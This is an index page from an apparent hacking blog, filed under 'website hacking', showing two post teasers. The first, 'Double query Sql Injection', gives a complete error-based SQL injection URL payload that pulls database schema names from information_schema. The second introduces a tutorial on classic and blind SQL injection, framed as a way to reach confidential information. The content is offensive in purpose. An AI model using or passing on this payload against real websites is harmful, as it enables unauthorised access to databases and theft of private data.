Showing posts with label website hacking. Show all posts
Showing posts with label website hacking. Show all posts

Saturday, March 30, 2013

Double query Sql Injection


Database :::
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Read more…

Blind & Classic SQL Injection




In this tutorial i will describe how sql injection works and how to use it to get some useful information.
First of all: What is SQL injection? It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential information etc...(in shortly).
1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part) So let's start with some action
1). Check for vulnerability Let's say that we have some site like this

Read more…